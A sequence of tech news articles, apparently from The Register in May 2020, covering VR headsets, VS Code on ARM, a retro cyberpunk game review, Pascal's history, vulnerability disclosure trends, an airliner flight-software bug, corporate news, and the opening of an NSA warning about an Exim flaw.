HP has given the moribund Windows Mixed Reality market a shot in the arm by opening pre-orders for its long-teased HP Reverb G2 headset.

The nerd goggles, built in collaboration with Valve and Microsoft, are a mouthwatering proposition for virtual reality fans, featuring a pair of 2,160 x 2,160 screens (a total of 9.3 million pixels), a 114° field of view and spatial 3D audio.

However, we’d have to sound a note of caution amid a definite feeling of déjà vu. It was, after all, just a year ago that the original Reverb finally stumbled out of the gate in the face of delays and mutterings over issues with the much-vaunted display panels. Those lucky enough to actually get hold of a unit reported delightfully crisp visuals, even as others complained about mura in the display. Second time lucky then.

Bragging that it was “keeping all of the best elements from the HP Reverb G1” and, we hope, none of the bad stuff, HP has shaved off the pounds. The headset weighs in at just 1.1lbs (500g), less than the published weights of the competition, although adding the six-metre cable might make things a bit more hefty.

HP touched on the display issues of the previous model indirectly, saying: “The new Valve-designed lenses provide a fantastic boost in the visual experience with optics and reduced mural full RGB stripe.”

Those screens remain head and shoulders above the current consumer kit from HTC and Oculus, at least in terms of resolution, and the headset does without base stations thanks to the four built-in tracking cameras.

The controllers have also been tweaked, featuring an “optimized button layout”, according to HP. One industry insider was hopeful of a redesign of the appendages, and told The Register: “All WMR hardware seems to just use the MS reference design. And they are shit.”

Unfortunately, you’ll need a hefty rig to get the best out of the thing (as with the wired Oculus Rift S). Microsoft’s last Windows Mixed Reality Ultra guidelines suggested that a Nvidia GTX 1060 or AMD Radeon RX 470/570 would be a good starting point.

This is a problem. Despite those displays being crisp enough to make out text that would otherwise remain murky and blurred, a user is still tethered to a high-powered PC in a way the forever sold-out Oculus Quest is not.

The Reverb G2 is due to land in July from £520+VAT while the competing Oculus Rift S (with its lower-resolution display) comes in at £399 including VAT.

The price difference may put some off, but availability will also be a factor. The Oculus hardware has remained stubbornly out of stock due to a jump in demand and wobbly supply chains. ®

Sponsored: How to simplify data protection on Amazon Web Services

Good news for those who have splashed the cash on Microsoft’s flagship Surface Pro X – the software behemoth has emitted an ARM64 build of Visual Studio Code.

#ARM people! It’s time to try @code Insiders right now! Nightly builds starting today for Windows 10 on ARM, including background updates!🙋‍♂️I admit, this Surface Pro X is starting to convince me 🖊

👉 Try it now: https://t.co/phkaKAIGzS
📞 Let us know your feedback as always! pic.twitter.com/KFAFQg5mWh

— João Moreno (@joaomoreno) May 28, 2020

It has been a while coming, having first been whined about back in 2017 as machinery running Windows on Arm hardware began to trickle into the market.

However, since Visual Studio Code depends on the Electron framework, support was not forthcoming until the platform itself played nicely with Windows on Arm. Back in 2018, one of the Electron team remarked: “We’re happy to support Electron on Windows on ARM as soon as Chromium does :)”

As 2019 rolled around, Electron 7.0.0 debuted, bringing with it the needed 64-bit Windows on Arm support. Microsoft’s crack at showing hardware makers what it actually meant when it said Windows on Arm cropped up as the Surface Pro X shortly after.

Sadly for those developers who took the plunge with the Windows giant’s new shiny, native Arm applications from Microsoft were somewhat thin on the ground. Even its own Chromium-based browser was notable by its absence and those wishing to get their kicks in the popular VS Code were forced to use the sluggish x86 emulation mode of the OS.

It took until February for Microsoft to finally release Chromium Edge for its ARM64 users, and in the same month a Windows Insider Fast Ring build added developer-friendly Hyper-V features for the platform. But of the beloved VS Code there remained no sign.

The wait, for VS Code Insiders at least, appears to be over. The code required to add support was merged last month and, after a Surface Pro X was made available for testing, released overnight.

While there remains work left to do to persuade extension authors to port their wares and, being still in the Insider branch, the platform is not quite ready for production yet, the news will bring relief to those developers wondering if that pricey Surface Pro X was really worth all that precious cash. ®

Sponsored: Webcast: Ransomware has gone nuclear

The RPG Greetings, traveller, and welcome back to The Register Plays Games, our monthly gaming column. 2020 (or is it 2077?) is the year of Cyberpunk on the Desktop, with CD Projekt Red due to release its hugely anticipated project in September. That’s still some way away, so we are once again forgoing the enhanced capabilities of our rig in favour of something that wouldn’t look out of place in Sierra’s early ’90s back catalogue. It’s also the first video game we’ve heard of to be published by a heavy metal record label. Do we have your attention? Then let us enter the VirtuaVerse.

He lay on his side and watched her breathe… the sweep of a flank defined with the functional elegance of a war plane’s fuselage. Her body was spare, neat, the muscles like a dancer’s.

Who wrote this tripe? It’s no “The sky above the port was the colour of television, tuned to a dead channel” but it comes from the same place. I never “got” William Gibson’s seminal cyberpunk psalter Neuromancer. In fact, I found it straight-up annoying to read, but many, including the countless evangelists who recommended it to me, would likely disagree. Despite its iffy writing, the novel’s influence cannot be denied and the sci-fi subgenre has gone on to penetrate every level of media in one form or another – even music.

If you’ve stuck your head underground in the right places, you may have come across a movement of retrofuturistic synthwave inspired by ’80s pop culture including names like France’s Perturbator and Carpenter Brut, or GosT and Lazerhawk over in the states among many, many others. It’s a sound that’s been trundling on for about a decade, but only more recently has it been recognised as what the kids call a “scene”, and an oversaturated one at that.

Compared to Kavinsky, another Frenchman who in 2013 released the landmark OutRun album, presumably named after the video game, some of these artists hit particularly hard and liberally ladle out the satanic slasher imagery, which endeared them to metalheads. One record label that catered to this subculture, Blood Music, saw the bridge and welcomed synthwave into its roster with open arms.

Why am I talking about this? On 12 May, Blood Music published its debut video game, VirtuaVerse, a throwback point-and-click adventure set in the not-so-distant future where humanity is increasingly hardwired into an augmented VR world disturbingly named “permanent reality.”

The concept was dreamt up by MASTER BOOT RECORD (MBR), “a 486DX-33MHz-64MB processing avant-garde chiptune, synthesized heavy metal and classical symphonic music” (I think he’s just an Italian bloke, though). We asked the Finland-based label boss, who asked to be referred to as “J”, how on earth he found himself bankrolling a computer game when his most notable projects have been exhaustive vinyl boxsets for Norwegian black metal legends Emperor, Finnish folk metal horde Moonsorrow, and even Devin Townsend’s whackjob metal outfit Strapping Young Lad.

“The game’s genesis lies with MASTER BOOT RECORD (story/soundtrack) and Valenberg (graphics/animation),” J told The Register. “MBR brought on a coder from his local circle, and the three of them developed independently for about a year-and-a-half.” The trio would go on to name themselves Theta Division.

“I had already worked closely with Valenberg on two music videos (Perturbator, GosT),” J continued. “MASTER BOOT RECORD also contacted me towards the beginning of [his musical project] to release albums together. I didn’t feel it fit the label at the time, but we kept in contact.

“I was only aware of the game through random social media posts. There was no discussion between any of us about it. In 2017, MBR released the album INTERRUPT REQUEST, and I fell in love with it. I wrote him and said I’d be interested in picking up our discussion about working together on music. And I tangentially dropped interest in the game, as it looked cool.

“It was a totally organic, ‘Hey, you’re working on that, want some help?’ And it ballooned from there. The dev team spoke internally and realised they could use a business partner who also had a fanbase in the cyberpunk scene, and we hashed out a deal to work together with MBR for several albums and the video game at the same time.”

On travelling the world of VirtuaVerse, the aesthetic crossover between the game and various albums released on Blood Music becomes obvious, particularly the throbbing soundtrack by MASTER BOOT RECORD. We asked J if this was a deciding factor in wading into the gaming scene. “Oh, absolutely,” he said. “One of the key visual elements from that scene has become the music video for Perturbator’s ‘Sentient’. A lot of the retrosynth/darksynth imagery was included in that video, [and] a lot of new imagery was born there.

Youtube Video

“Valenberg designed and animated that music video, and his style is completely recognisable in the game. The cyberpunk crossover is evident. I think that drew a lot of fans of the label to the game, which made the release not only seamless but interesting for the label’s fans.”

Though J is a stranger to modern gaming, he said he played them “religiously” as a child, “including a lot of early point-and-click adventures. I was in the Sierra camp, mostly playing King’s Quest and Police Quest. There has been a longstanding, friendly feud inside the team where the other three are LucasArts fanatics, but Monkey Island was actually new to me when I started working on this game. I never had those games as a kid. I abandoned gaming after the Sega Genesis/Master System. I picked it up with the Dreamcast but left again for about 20 years.”

I’d be far more interested to publish another game than sign another band at this time.

We posited that, if that’s the case, it’s a quite the leap into the unknown to suddenly start publishing games. He said: “To be honest, releasing music has become rote for me. It’s the same process over and over and over, and many people in the industry become insecure or even furious when you deviate from the traditional path.

“I’m interested in challenging myself and exploring new ground. It gave me the courage and energy to jump back in. Immediately upon signing, I bought an Xbox and a Switch and spent two years binge-playing leading up to the release. Even past the release, I’m still binge-playing. Currently getting towards the end of [Hellblade: Senua’s Sacrifice].”

Would he do it again? “I haven’t discussed the possibility with any other development teams. However, I found the process of working on games much more rewarding and inviting than releasing music. Any internal issues we had were solved usually within an hour (versus sometimes years in the music industry).

“We exhibited VirtuaVerse at Gamescom and have been in contact with teams at all the major publishers, PC and console. Everyone is friendly as hell and seems to want the best for everyone. We were approached multiple times by grant boards telling us about their offerings, which blows my mind. People haggle over $2 or $3 in the music industry. Music is in a difficult downward spiral, and everyone is squeezed.

“My experience in the music industry is that most of the people are fighting for their lives and ready to stab each other in the back. It isn’t true of everyone, and I’ve met some incredible people through there. But I’ve found it far colder, less supportive overall, and more restrictive. It’s a perfect industry to lose your mind in.

“To answer your question, I’d be far more interested to publish another game than sign another band at this time.”

But what of VirtuaVerse? Blood Music describes the game thus: “In a future not so far away, one superior intelligence prevails above all other AI. Society is migrating to a permanently integrated reality connected to a single neural network, continuously optimizing user experience by processing personal data.

“An outsider, Nathan, makes a living off the grid as a smuggler of modded hardware and cracked software. Geared with a custom headset, he is among the few that can switch AVR off and see reality for what it truly is. Nathan shares an apartment with his girlfriend Jay, a talented AVR graffiti artist whose drones bit-spray techno-color all over the city’s augmented space.

“One morning, Nathan wakes to an empty apartment and discovers a cryptic message on the bathroom mirror. Having accidentally broken his headset, Nathan is disconnected but determined to figure out what happened to Jay. He embarks on an unbelievable journey involving hacker groups and guilds of AVR technomancers.”

So begins a neon-soaked journey through hardware graveyards, digital archaeology, tribes of cryptoshamans, and virtual-reality debauchery. VirtuaVerse‘s graphics aren’t quite as good as, say, the first Monkey Island game (1990), a gold standard of the adventure genre, but though there are fewer pixels to play with, Valenberg’s art wizardry captures the essence of the cyberpunk genre – constant advertising, hacker crews, flying cars, grimy back alleys, and jacked-in addicts.

Despite its high-tech subject matter, VirtuaVerse is a primitive paean to the point-and-clickers of old. You need only the one functional hand to play, left-clicking to move Nathan and interact with objects. A click on an item brings up a submenu of sorts, giving the option to examine or pick it up. Your bottomless inventory, which as usual has a comically TARDIS-like ability to carry even the most cumbersome objects, serves as a means to combine items or offer them to other characters and so on. If you are a big fan of that era, you’ll feel right at home because there is barely any innovation in gameplay or style, bar the ability to switch your AVR headset on and off, revealing potential routes to solving the game’s many puzzles.

Is this a good thing? Yes and no. VirtuaVerse makes no attempt to claim it is anything more than a love letter to those early days. It’s the sort of retro worship that is mirrored in its characters’ reverence of floppy disks and CRT monitors – useless but also kind of cute. On the other hand, gaming has moved on and VirtuaVerse feels dated. Even towards the end of the ’90s LucasArts was breathing new life into the adventure game. Titles like Grim Fandango showed you could render the same spirit in 3D and switch to a keyboard control scheme. A nice touch was that the main character would turn his head to look at items of interest so you knew you could interact with them, and maybe even use them to your benefit.

VirtuaVerse often turns into a bit of a pixel hunt. You can enter a room, exhaust dialogue options, mess with everything in there, leave, and be none the wiser. But there will be a critical object that stands out no more than anything else in the scene, which drove me to frustration on more than one occasion. And then there’s the puzzles. Hooo boy. This game is hard, OK? Mercifully, VirtuaVerse includes a “journal” feature, which helps to remind you what your end goal of each section should be – but the route is protracted and rarely makes much sense at the time. Once you solve one tiny piece, you immediately hit a brick wall again.

The legendary Yahtzee Croshaw describes it best:

Croshaw would be the first to admit he’s prone to exaggeration, and VirtuaVerse perhaps isn’t quite that maddening, but I assure you, after your third hour stumbling around blindly missing a gaping hole in the puzzle, you will be twitching for a walkthrough.

To some of you, however, all this probably sounds delightfully familiar and you’re rubbing your hands in glee at the thought of donning your nostalgia goggles once more. Regular readers in particular will no doubt relish the obscure programmer humour, too. If that’s the case, you’ll love it. But if you’d rather smack yourself in the face with rusty shovel, well, there’s always Doom Eternal. ®

Sponsored: Practical tips for Office 365 tenant-to-tenant migration

Pascal, a descendant of ALGOL 60 and darling of computer science courses for decades, turns 50 this year.

For engineers of a certain age, Pascal was hard to avoid in the latter part of the last century. Named for 17th-century French mathematician Blaise Pascal, the language is attributed to Swiss computer scientist Niklaus Wirth and was created in part due to Wirth’s frustration with the process to improve the ALGOL 60 language.

Involved in the ALGOL X effort, Wirth proposed ALGOL W, which, while not deemed a sufficient advance over ALGOL 60, became Pascal in 1970.

Originally intended as a small and efficient language – vital for the computers of the day – Pascal was also pitched as a useful way to teach good programming practices and featured strong typing as well as complicated data types. Becoming very successful in the 1970s, it was a staple of university computer science courses by the 1980s (including one attended by this writer).

While many Pascal compilers were created over the years for a variety of purposes (a common one being self-hosting), a pair of notable implementations existed in the form of UCSD Pascal and Borland Software Corporation’s flavours, Turbo (later Object) Pascal and Delphi.

UCSD Pascal

The former, created by the University of California, San Diego (UCSD), was an intriguing implementation initially aimed at providing the same environment for students over the differing minicomputer platforms available at the time.

Led by the late Kenneth Bowles, the UCSD Pascal programming system consisted of the language, an operating system and a suite of tools. Tweaked to run on the microcomputers of the day and being pretty much hardware independent through use of what looks suspiciously like a virtual machine, UCSD Pascal cropped up in many places, from the IBM PC to the Apple II. Even a TI-99/4A equipped with a p-code card could run the system.

UCSD Pascal made use of the Pascal-P2 compiler, one of four emitted by the Zurich team and aimed at promoting the propagation of the language. Hugely popular, its crown did not slip until another implementation put in an appearance.

Turbo Pascal

Based on the Blue Label Pascal compiler by Anders Hejlsberg, Turbo Pascal arrived in 1983 courtesy of Borland. Dubbed “Turbo” due to the speed of compilation and the executables spat out, the system was quite revolutionary for the time. The development environment made the language accessible to those more used to BASIC and the performance was a considerable step up from the interpreted languages that had gone before.

Versions existed for computers running the likes of DOS and CP/M, and the whole thing would cheerfully run on a single floppy disk and in 64KB of memory.

Turbo Pascal would go through multiple iterations, dropping support for CP/M as it did so, but it would take until version 5.5 in the latter part of the 1980s that object-oriented programming features appeared, eventually implemented as a dialect of Object Pascal for Delphi.

The tale of Object Pascal itself is worthy of note, stemming from Apple’s licensing of UCSD Pascal for the Apple II and III. The company developed object-oriented extensions (with input from Wirth) to the Pascal language to support the Macintosh Application Framework, MacApp, before eventually moving away in the direction of C++.

Turbo Pascal for Windows turned up in the 1990s, proving to be a good deal more complicated to make work than Microsoft’s Visual BASIC before eventually being sidelined in favour of Delphi, which celebrated its own 25-year milestone this year.

Delphi did much to keep the Pascal flame burning bright in the Windows world for a few more years as programmers seeking something more advanced and faster than Visual BASIC gobbled up Borland’s implementation of the language with gusto.

As for Pascal itself, it was eventually displaced by the newfangled C++ as the 1990s progressed, and other vendors provided IDEs that scratched that Turbo Pascal itch. A shame since C++ could be a good deal trickier while not being particularly more performant back in the day.

It is no surprise that, after Delphi, Hejlsberg lead the C# team at Microsoft and became a big noise in the TypeScript world.

Wirth himself moved on to design the Modula, Modula-2 and Oberon languages through the 1970s and 1980s. All would seem familiar to Pascal fans and, like many other languages, can trace their lineage back to ALGOL.

While Pascal’s commercial usage has declined (although it can still be found in use as a teaching tool), its influence continues to be felt. The virtual machine beloved by Java fans owes some debt to the work of UCSD Pascal, and the posterior kicking administered by Turbo Pascal and Delphi played no small part in the design of the development tools in use today. And, of course, generations of developers picked up coding at the hands of the language.

Further reading

If you can find a copy, Niklaus Wirth’s Algorithms + Data Structures = Programs is well worth a read for an understanding of the early history of Pascal. As well receiving the Turing Award in 1984, Wirth has also given several interviews and presentations over the years, many of which are well worth a watch.

There are also any number of Pascal compilers out there, but for that full retro feel, Turbo Pascal versions 1.0, 3.02 and 5.5 were designated freeware two decades ago (assuming you can find them and the hardware to make them run).

Delphi also remains available from Embarcadero. ®

Sponsored: Webcast: Ransomware has gone nuclear

Over the first quarter of 2020, the number of security bugs disclosed by software makers fell 20 per cent though not for any of the right reasons, it seems.

Analysts at Risk Based Security cited both internal data and public reports from vendors in putting the number of security vulnerabilities reported over the first three months of the year at 4,968, down from 6,198 over the same period in 2019.

This marks the first time in 10 years that the biz has seen a drop from the previous year’s quarter.

While the analysts are not certain why there was such a sharp fall, they say it’s probable that the dip had more to do with COVID-19 coronavirus outbreak, and resulting economic downturn, than any sudden improvements in the quality of code being written.

“The big outlier and unknown is COVID-19,” Brian Martin, Risk Based Security’s vice president of vulnerability intelligence, told The Reg. “That speculation is what we were thinking months ago, though we didn’t expect [the number] to go down so much.”

One likely explanation, Martin told us, is that there are simply more vulnerability reports incoming than there are people at vendors who can handle them. With workplace interruption and job cuts becoming more prevalent, many software makers could be struggling to keep up, with Chinese vendors getting hit earliest, followed by Europe and the US.

“A company may say we are down on our staff, we might only write advisories for critical vulnerabilities,” Martin said. “At the end of the year as companies staff their security teams back up we might see them retroactively release advisories.”

Lot of crits out there

This, as Martin noted, can be dangerous for end users and companies, as they stand to miss out on patches for issues that aren’t being publicly documented or addressed at all. He reckoned that, for the quarter, some 561 reported bugs were not given CVE numbers, and 60 per cent of those were critical issues, such as remote code execution bugs.

The number of publicly disclosed bugs is likely to pick up over the course of the year, and as the backlogs start to get sorted out, the analyst believes the total tally could climb back up around 6,000, still down slightly from 2019, but more in line with the levels seen in previous years.

That recovery, however, could take some time, and Martin told The Reg we’re likely to see vendors looking to play catch-up by backloading non-essential patching and documentation towards the end of the year and into the first quarter of 2021.

In other words, don’t be too surprised if, later this year, we get a flood of security advisories that reference bugs from the early months of the year. It doesn’t mean that we’re being overloaded with zero-days, rather it will just be a matter of companies getting caught up on publicly disclosing things from the first quarter.

“Even though the solution may have been made in February, the advisory won’t come out until November,” Martin said. “It could carry on into the New Year, in the fourth quarter or Q1 of 2021 we might see it.” ®

Sponsored: Webcast: Ransomware has gone nuclear

A very specific software bug made airliners turn the wrong way if their pilots adjusted a pre-set altitude limit.

The bug, discovered on Bombardier CRJ-200 aircraft fitted with Rockwell Collins Aerospace-made flight management systems (FMSes), led to airliners trying to follow certain missed approaches turning right instead of left – or vice versa.

Missed approaches are used when pilots aren’t confident that they’re going to land safely. They are a published path that helps the pilot safely position the aeroplane for another attempt.

First discovered in 2017, the flaw was only apparent when pilots manually edited a pre-set “climb to” altitude programmed into a “missed approach” procedure following an Instrument Landing System approach. It also arose if pilots used the FMS’s temperature compensation function in extremely cold weather.

In theory the bug could have led to airliners crashing into the ground, though the presence of two trained and alert humans in the cockpit monitoring what the aircraft was doing made this a remote possibility.

The bug was first uncovered when a CRJ-200 crew flying into Canada’s Fort St John airport used the FMS’s temperature correction function. They discovered that the software turned their aeroplane in the wrong direction while it was following the published missed approach, something that generally does not happen. The fault was swiftly reported to the authorities and the relevant manufacturers.

As explained to El Reg by a professional aviator, temperature correction is a function of modern FMSes that helps keep aeroplanes at a safe height above ground while following published approach paths under instrument flight rules (or the autopilot). Airport approaches are designed with a given set of atmospheric conditions, including a standard temperature, in mind. When real-world temperatures drop below certain limits, pilots must apply a correction to their altimeters in order to stay at a safe height above ground. Lower temperatures, for a given atmospheric pressure, introduce a progressively greater error in the altimeter reading.

Full details, including the maths, are available here.

In a Powerpoint presentation published (PDF) on the US Federal Aviation Authority website, Rockwell Collins explained that “an error in the design of the Pro Line 4 FMC software causes changes to the procedure-defined turn direction, during a missed approach when the procedure has been significantly modified… The FMS may change the planned database turn direction to an incorrect turn direction when the altitude climb field is edited.”

The incorrect turn direction, said the company, “is dependent on leg types and geometries of the instrument departure procedure and missed approach procedures.” In other words, the bug only occurred rarely and under specific conditions.

Another document published by Rockwell Collins in late 2017 (PDF) stated: “This issue will occur in departures and missed approaches where the shortest turn direction is different than the required turn direction onto the next leg if the crew edits the ‘Climb to’ altitude field.”

Although mitigations and workarounds for the bug were published relatively quickly, Bombardier and Rockwell Collins disagreed with the FAA on the formal steps to be taken about it; a mandatory airworthiness directive ordering operators of CRJ-200 aircraft to disable the automatic temperature compensation was published in Europe this week and goes into force in mid-June.

Both companies disagreed with the FAA’s directive when it was in draft format, arguing that a software fix would be easier to accomplish than banning the use of the automatic calculator. Rockwell Collins and Bombardier have both been asked for comment.

Bugs in flight control software are rare, though not unknown. Most bugs in airliners tend to be unforeseen memory overflows, as both Airbus and Boeing have discovered over the years. A design formerly owned by Bombardier, the Airbus A220 (nee Bombardier C-series) suffered from software-induced problems with its engines last year, while the Boeing 737 was discovered to have a rare bug that completely blanked all cockpit displays if pilots tried to land on one of seven specific runways in the world.

And there’s the other Boeing 737 Max software problem, but that one is very well known by now. ®

Sponsored: Webcast: Ransomware has gone nuclear

Swiss peripherals maker Logitech has lifted the lid on its latest mechanical keyboard – the G915 TKL.

The intended target audience seems to be die-hard gamers, and the G915 TKL hopes to win over this demographic with its ultra-slender mechanical keyswitches and more RGB lights than you can shake a stick at.

The G915 TKL also emphasises portability. By forgoing the number pad, the keyboard is much narrower, making it easier to chuck in a backpack when you’re off to a LAN party. It measures just 21.6cm across.

That’s svelte compared to most mechanical keyboards. For the sake of contrast, the keyboard I’m writing this piece on (a Unicomp SpaceSaver) measures 45.5cm in length, which is more than double that of the G915 TKL.

It’s thin, too, with a stated depth of 3.3cm. A major reason behind that is Logitech’s use of its in-house GL mechanical keyswitches, which are designed to be low profile.

The overwhelming majority of mechanical keyboards on the market use Cherry’s keyswitches, or some flavor of Chinese knock-off. While these are tried and tested, they were also designed in the 1980s. Industrial design has since moved on, and Logitech reckons it can produce slimmer keyswitches that feel equally pleasant to type on.

They’re not far off. A couple of weeks ago, a G815 crossed my desk, packing Logitech’s GL tactile switches. These are Logitech’s closest approximation to the venerable Cherry MX Brown switches, themselves serving as a happy middle ground between the ultra-responsive “linear” Cherry Red switches, and the ubiquitous “clicky” Cherry Blue switches. For the most part, I was impressed.

Obviously, Logitech has bowed to the gaming peripheral cliché of filling the kit with RGB lighting. This is more style than substance, and clearly doesn’t really make it easier to type. But if you’re taking this thing to a competitive gaming party, this might be for you.

The G915 TKL also differs itself in a crowded market with the inclusion of wireless connectivity. While this isn’t the solitary wireless keyboard on the market (there are excellent options from the like of Happy Hacking and Obins), it’s fair to say that it belongs to a somewhat exclusive club.

Battery life is 40 hours with the RGB lights switched on and a claimed 135 days with it deactivated. The keyboard can be fully recharged with three hours connected to a power source, Logitech says.

At £199.99, the G915 TKL isn’t cheap – even by the standards of wireless mechanical keyboards, which are a relatively scarce commodity. That said, the slender form factor helps differentiate this keyboard in an otherwise crowded market. If you’re tempted, it’ll be available next month in linear, tactile, and clicky variants. ®

Sponsored: Ransomware has gone nuclear

Wipro has named its new CEO: 25-year Capgemini veteran Thierry Delaporte will take the big chair as of July 6th.

The company’s current CEO Abid Neemuchwala announced in January 2020 that he planned to step down due to family commitments and the board commenced a search for his successor.

While the canned statement announcing Delaporte’s selection is light on detail, the fact that he led Capgemini’s Indian operations can’t have hurt his prospects, nor would his time atop the consultancy’s global service lines.

Wipro has not always matched its rivals’ vigour in recent years, so Delaporte’s experience leading transformation at Capgemini may also have been attractive.

The new CEO will be based in Paris, where Wipro has offices in the La Défense business district. Neemuchwala lived in Dallas, Texas.

Delaporte has an interesting time ahead of him. Wipro’s FY 19/20 revenue reached $8.1bn but the company has grown slowly in recent years and been surpassed by the likes of HCL and Infosys. The announcement of his appointment quotes him as wanting to usher in “a new chapter of growth and build a better tomorrow for all our stakeholders.”

Which will mean a post-pandemic strategy, solidifying recently-struck partnerships with Microsoft and Nutanix, continuing to build cloud and security capability that has done well for the company and doing that all around the world! Or maybe Delaporte has other plans. Whatever they are, The Reg will be watching. ®

Bootnote

Wipro was founded as “Western India Palm Refined Oil Limited”.

Sponsored: Ransomware has gone nuclear

On Call Friday has rolled around once more, bookending a sunny week in the UK and promising a weekend free of actual work. Unless, of course, you are one of the unfortunates cursed to be On Call.

Today’s story takes us around the world and back to the 1990s in the company of a Register reader that the ever-creative Regorandomiser has named “Barbara”, for that is not her real name.

Barbara was a fresh-faced engineer for a multinational that we shall call “Powerzilla”.

“We were doing combustion turbine installs for the Korean government that was building new cities around Seoul to relieve overcrowding,” she recalled.

Each of the new cities required a power station, and Powerzilla had the contract for two of them. It was Barbara’s first overseas assignment. It would also be her last.

“We had gotten a couple of the units to the point that we were doing reliability runs in preparation to turn them over to the local utility,” she told us. A reliability run meant running the unit at full load, continuously, for five days.

All was going well until a few days into one of the runs when Barbara arrived at site to find a unit had tripped offline. Naturally, it was winter and of course it was freezing, but still she trudged out to discover what had befallen the device.

A look at the alarm list and the operator event review (referred to by Barbara as the “tattle-tell”) spat out by the dot-matrix printer showed the cause. Hours before any Powerzilla staff had turned up, somebody had fiddled with a temperature setting which caused the unit to trip shortly afterwards.

It was, said Barbara, “no big deal, just some operator mucking about, and the trip didn’t count against the run.”

Problem solved, the team got back to work. But sure enough, a few days later a unit tripped once again and required Barbara to be called out early to deal with it.

Once more she trudged out to get the print-out from the dot-matrix but… it wasn’t there.

Surrounded by an entourage of staff from the energy utility, she tried to explain how important the alarm list was in diagnosing the cause of the trip, but all she received were shaking heads and looks of incomprehension.

“I should mention at this point,” she said, “that everyone I met in Korea understood and spoke at least a modicum of English (unlike this stupid American who can barely speak their own native language), but it was amazing how fast they would forget English when convenient.”

The blank looks continued as the staffers drifted away. After all, nothing was going wrong at that moment. There was just an American complaining about a missing alarm list.

At this point Barbara revealed a bit of cunning. She’d hidden a backup printer with another unit that was still under construction and a copy of the alarm list was sitting smugly atop it. A theatrical tear of the paper later and she had her explanation – “another operator mucking about with the settings, causing the trip.”

As she strode back to the offices, clutching the paperwork, she was suddenly surrounded by a crowd of South Korean operators and managers, all of whom had suddenly rediscovered the ability to converse in English. The concerned staffers wondered where the print-out had come from and what was on it.

After all, the operators had insisted there had been no fiddling with the settings and their managers had backed them up.

“I had caught them in a bald-faced lie, making them lose face,” Barbara recalled. While possibly a little hard for some to understand, the concept of saving face is core to many cultures to the point of hiding the tattle-tell alarm list in order to avoid embarrassment and preserve reputation.

While Barbara’s management had a field day with the information and botched attempt at a cover-up, she became “Bad Miss Barb” for not allowing the backup alarm list to be quietly disposed of, not telling anyone about the other printer and, worst of all, letting the on-site crew get caught in a lie.

“In the end,” she remembered, “it was all good. We had no more issues with settings being changed by them, and all the units got successfully commissioned and turned over.”

Sadly though, “no good deed goes unpunished,” she sighed. Upon her return to the US, she was hauled over the carpet for “making changes to the control system willy-nilly and without approval of the controls group”.

She was not allowed to show the evidence that she had approval from local management, nor that the changes were aimed at protecting the units.

Later, when asked to go out to another country for another job, she demurred or “told them to pound salt”, as she put it (we can imagine fruitier language being deployed).

“Amazingly, I wasn’t fired.”

Ever managed to cause mortal offence when you were just trying to help? Or caught a customer in a whopper of lie and naively chose the path of truth? You have? Send an email to the On Call corner and tell all. ®

Sponsored: Webcast: Simplify data protection on AWS

VMware’s financial performance appears to have been virtually untouched by the novel coronavirus, after the company today posted fiscal Q1 2020 revenue of $2.734bn – four million dollars more than the guidance it pulled due to uncertainty about the pandemic’s impact on the world economy.

The company did experience some financial impact [PDF] as core software-defined data centre products declined 7 per cent year on year, attributed to customers just having other things to worry about. Sales of end-user compute tools made up the gap, jumping by 10 per cent year on year. Both VMware-on-AWS and Carbon Black recorded triple digit year-on-year growth while its virtual storage and network virtualisation products each scored 20-per-cent-plus growth.

Overall, for the three months to January 31, revenue was up 11.6 per cent, still decent even with the recently acquired Pivotal’s $200m a quarter now on the books.

CEO Pat Gelsinger on Thursday told investors he expects the next couple of quarters to be tough and that “no market segment, no geo is immune to those effects.” But he also said he expects the technology industry growth to outperform gross domestic product and cloud to outperform the technology industry. Which with GDP predicted to plunge by ten percent or more in some nations, and demand for tech down five to ten percent, could leave VMware and other cloud-centric companies looking at a still-substantial contraction.

Gelsinger said VMware recognises it has a job ahead of it. The CEO believes his sales team showed they can work remotely effectively in Q1, but that the company will need “new sales muscles” as customers’ priorities change and VMware has to find a way to ensure projects it is a part of still get the green light.

He doesn’t see the recently released version of vSphere with Kubernetes helping much as that will take a couple of years to be widely adopted.

The company offered guidance of “approximately $2.8bn” for its fiscal Q2, but declined to re-state full-year guidance. When the company did so it predicted a $12bn haul for the year. Now it’s happy to tell investors they can expect “mid-single digits for full year FY 2021” which would still mean revenue of over $10bn.

So it looks like VMware has a decent chance of emerging from the pandemic in healthy financial shape. The Register has encountered mentions of generosity to its staff, although we’re not sure if a staff-only Zoom concert by country music star Keith Urban (the existence of which was Tweeted by VMware COO Sanjay Poonen) fits into that category.

Thank you @KeithUrban for a great private virtual @zoom_us concert for @VMware and our customers tonight. This is me and my son watching you. I’m itching to jam on the piano behimd me, to one of your great tunes!!!:) pic.twitter.com/3442mFPoww

— Sanjay Poonen (@spoonen) May 28, 2020

In other VMware news, the company today divulged three bugs that impact its VMware ESXi, Workstation, Fusion, VMware Remote Console and Horizon Client products. The worst of the three, CVE-2020-3958, is rated 7.3 because it offers the chance for local privilege escalation. ®

Sponsored: Ransomware has gone nuclear

The controversial CEO of money-burning virtual reality startup Magic Leap has announced he’;s leaving the job.

Rony Abovitz posted the news on Thursday, recounting how the since the company “pivoted to focus on delivering a spatial computing platform for enterprise” he and the board have “agreed that now is the time to bring in a new CEO who can help us to commercialize our focused plan”.

Abovitz founded the company in 2011 and helped it to raise $2.6bn of investment, plenty of it won with breathtaking “demos” of the company’s VR tech that were actually just special effects videos.

Magic Leap did deliver a VR headset, but reviewers did not think the $2,295 gadget was particularly magical or a leap beyond competitors such as Microsoft’s Hololens. Nor was it anywhere near the company’s promise of a device that can be “worn all day, every day, by everyone.”

Despite having failed to deliver his vision as leader, Abovitz wrote that he intends to stick around.

“I will remain our CEO through the transition and am in discussions with the Board with regards to how I will continue to provide strategy and vision from a Board level,” he wrote, adding: “I remain super excited about Magic Leap’s future and believe deeply in our team and all of their incredible talent and capabilities.”

That team was halved in April 2020 as a cost control measure, however the company last week scored a further $350m investment to help it “expand product-market fit and revenue generation.”

Which we think translates as “we really must develop products somebody will pay for.” The company’s plans currently call for that product to deliver “… the ability for businesses to operate across vast distances and connect with their customers in ways that mimic physical interactions”.

And there we were thinking that converting free Teams trials into paying punters was the next big thing. ®

Sponsored: How to simplify data protection on Amazon Web Services

The NSA has raised the alarm over what it says is Russia’s active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin’s military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

